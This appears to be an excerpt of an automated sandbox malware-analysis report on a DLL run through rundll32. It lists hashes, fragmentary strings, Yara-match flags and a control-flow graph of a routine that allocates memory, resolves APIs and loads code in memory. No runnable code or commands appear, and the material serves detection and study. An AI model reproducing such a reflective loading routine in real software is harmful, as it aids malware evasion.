                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Qq$bt$vird$+$S
                                                                                                                                      • API String ID: 0-3373980505
                                                                                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: V$@$P9$^_"
                                                                                                                                      • API String ID: 0-1880944046
                                                                                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                      • API String ID: 0-746338152
                                                                                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *i^$MIC$-Z$]2
                                                                                                                                      • API String ID: 0-498664264
                                                                                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: B$EG$QsF$_
                                                                                                                                      • API String ID: 0-784369960
                                                                                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                      • API String ID: 0-1363032466
                                                                                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *+_$WSh$\O$#o
                                                                                                                                      • API String ID: 0-1846314129
                                                                                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .B$O$M*K$\<
                                                                                                                                      • API String ID: 0-3225238681
                                                                                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$$$xVO$~O
                                                                                                                                      • API String ID: 0-3655128719
                                                                                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,IW$G$JMg$l
                                                                                                                                      • API String ID: 0-1370644289
                                                                                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$,$2S=$i`}G
                                                                                                                                      • API String ID: 0-4285990414
                                                                                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:11
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 3264 2451d880000 3265 2451d880183 3264->3265 3266 2451d88043e VirtualAlloc 3265->3266 3269 2451d880462 3266->3269 3267 2451d880531 GetNativeSystemInfo 3268 2451d88056d VirtualAlloc 3267->3268 3271 2451d880a7b 3267->3271 3274 2451d88058b 3268->3274 3269->3267 3269->3271 3270 2451d880a00 3270->3271 3272 2451d880a56 RtlAddFunctionTable 3270->3272 3272->3271 3273 2451d8809d9 VirtualProtect 3273->3274 3274->3270 3274->3273

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 2451d880000-2451d880460 call 2451d880aa8 * 2 VirtualAlloc 22 2451d880462-2451d880466 0->22 23 2451d88048a-2451d880494 0->23 24 2451d880468-2451d880488 22->24 26 2451d880a91-2451d880aa6 23->26 27 2451d88049a-2451d88049e 23->27 24->23 24->24 27->26 28 2451d8804a4-2451d8804a8 27->28 28->26 29 2451d8804ae-2451d8804b2 28->29 29->26 30 2451d8804b8-2451d8804bf 29->30 30->26 31 2451d8804c5-2451d8804d2 30->31 31->26 32 2451d8804d8-2451d8804e1 31->32 32->26 33 2451d8804e7-2451d8804f4 32->33 33->26 34 2451d8804fa-2451d880507 33->34 35 2451d880531-2451d880567 GetNativeSystemInfo 34->35 36 2451d880509-2451d880511 34->36 35->26 37 2451d88056d-2451d880589 VirtualAlloc 35->37 38 2451d880513-2451d880518 36->38 39 2451d8805a0-2451d8805ac 37->39 40 2451d88058b-2451d88059e 37->40 41 2451d880521 38->41 42 2451d88051a-2451d88051f 38->42 44 2451d8805af-2451d8805b2 39->44 40->39 43 2451d880523-2451d88052f 41->43 42->43 43->35 43->38 46 2451d8805c1-2451d8805db 44->46 47 2451d8805b4-2451d8805bf 44->47 48 2451d8805dd-2451d8805e2 46->48 49 2451d88061b-2451d880622 46->49 47->44 50 2451d8805e4-2451d8805ea 48->50 51 2451d880628-2451d88062f 49->51 52 2451d8806db-2451d8806e2 49->52 56 2451d88060b-2451d880619 50->56 57 2451d8805ec-2451d880609 50->57 51->52 53 2451d880635-2451d880642 51->53 54 2451d880864-2451d88086b 52->54 55 2451d8806e8-2451d8806f9 52->55 53->52 58 2451d880648-2451d88064f 53->58 60 2451d880871-2451d88087f 54->60 61 2451d880917-2451d880929 54->61 59 2451d880702-2451d880705 55->59 56->49 56->50 57->56 57->57 63 2451d880654-2451d880658 58->63 64 2451d880707-2451d88070a 59->64 65 2451d8806fb-2451d8806ff 59->65 62 2451d88090e-2451d880911 60->62 66 2451d88092f-2451d880937 61->66 67 2451d880a07-2451d880a1a 61->67 62->61 72 2451d880884-2451d8808a9 62->72 69 2451d8806c0-2451d8806ca 63->69 70 2451d880788-2451d88078e 64->70 71 2451d88070c-2451d88071d 64->71 65->59 68 2451d88093b-2451d88093f 66->68 87 2451d880a40-2451d880a4a 67->87 88 2451d880a1c-2451d880a27 67->88 73 2451d880945-2451d88095a 68->73 74 2451d8809ec-2451d8809fa 68->74 78 2451d88065a-2451d880669 69->78 79 2451d8806cc-2451d8806d2 69->79 76 2451d880794-2451d8807a2 70->76 75 2451d88071f-2451d880720 71->75 71->76 94 2451d880907-2451d88090c 72->94 95 2451d8808ab-2451d8808b1 72->95 80 2451d88097b-2451d88097d 73->80 81 2451d88095c-2451d88095e 73->81 74->68 83 2451d880a00-2451d880a01 74->83 86 2451d880722-2451d880784 75->86 89 2451d88085d-2451d88085e 76->89 90 2451d8807a8 76->90 84 2451d88067a-2451d88067e 78->84 85 2451d88066b-2451d880678 78->85 79->63 91 2451d8806d4-2451d8806d5 79->91 97 2451d88097f-2451d880981 80->97 98 2451d8809a2-2451d8809a4 80->98 92 2451d88096e-2451d880979 81->92 93 2451d880960-2451d88096c 81->93 83->67 99 2451d880680-2451d88068a 84->99 100 2451d88068c-2451d880690 84->100 96 2451d8806bd-2451d8806be 85->96 86->86 101 2451d880786 86->101 104 2451d880a7b-2451d880a8e 87->104 105 2451d880a4c-2451d880a54 87->105 102 2451d880a38-2451d880a3e 88->102 89->54 103 2451d8807ae-2451d8807d4 90->103 91->52 106 2451d8809be-2451d8809bf 92->106 93->106 94->62 114 2451d8808b3-2451d8808b9 95->114 115 2451d8808bb-2451d8808c8 95->115 96->69 107 2451d880983-2451d880987 97->107 108 2451d880989-2451d88098b 97->108 112 2451d8809a6-2451d8809aa 98->112 113 2451d8809ac-2451d8809bb 98->113 109 2451d8806b6-2451d8806ba 99->109 110 2451d880692-2451d8806a3 100->110 111 2451d8806a5-2451d8806a9 100->111 101->76 102->87 116 2451d880a29-2451d880a35 102->116 131 2451d880835-2451d880839 103->131 132 2451d8807d6-2451d8807d9 103->132 104->26 105->104 117 2451d880a56-2451d880a79 RtlAddFunctionTable 105->117 121 2451d8809c5-2451d8809cb 106->121 107->106 108->98 119 2451d88098d-2451d88098f 108->119 109->96 110->109 111->96 120 2451d8806ab-2451d8806b3 111->120 112->106 113->106 122 2451d8808ea-2451d8808fe 114->122 123 2451d8808d3-2451d8808e5 115->123 124 2451d8808ca-2451d8808d1 115->124 116->102 117->104 126 2451d880991-2451d880997 119->126 127 2451d880999-2451d8809a0 119->127 120->109 128 2451d8809cd-2451d8809d3 121->128 129 2451d8809d9-2451d8809e9 VirtualProtect 121->129 122->94 142 2451d880900-2451d880905 122->142 123->122 124->123 124->124 126->106 127->121 128->129 129->74 135 2451d880844-2451d880850 131->135 136 2451d88083b 131->136 133 2451d8807e3-2451d8807f0 132->133 134 2451d8807db-2451d8807e1 132->134 139 2451d8807f2-2451d8807f9 133->139 140 2451d8807fb-2451d88080d 133->140 138 2451d880812-2451d88082c 134->138 135->103 141 2451d880856-2451d880857 135->141 136->135 138->131 144 2451d88082e-2451d880833 138->144 139->139 139->140 140->138 141->89 142->95 144->132
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.283223332.000002451D880000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002451D880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_2451d880000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: 9359a34ba049ea305e3bb0f87045c10c793c92d397778ecfb3ae2b9b6e3c1a27
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 4172E430618B589BDB69DF18C8897B9B7E1FB94304F10462DE8CEC3252DB34E946CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                      • API String ID: 0-464535774
                                                                                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                      • API String ID: 0-3528011396
                                                                                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                      • API String ID: 0-3036092626
                                                                                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +#;)$K'$sf$w\H
                                                                                                                                      • API String ID: 0-1051058546
                                                                                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <4P$<8$<w.
                                                                                                                                      • API String ID: 0-1030867500
                                                                                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
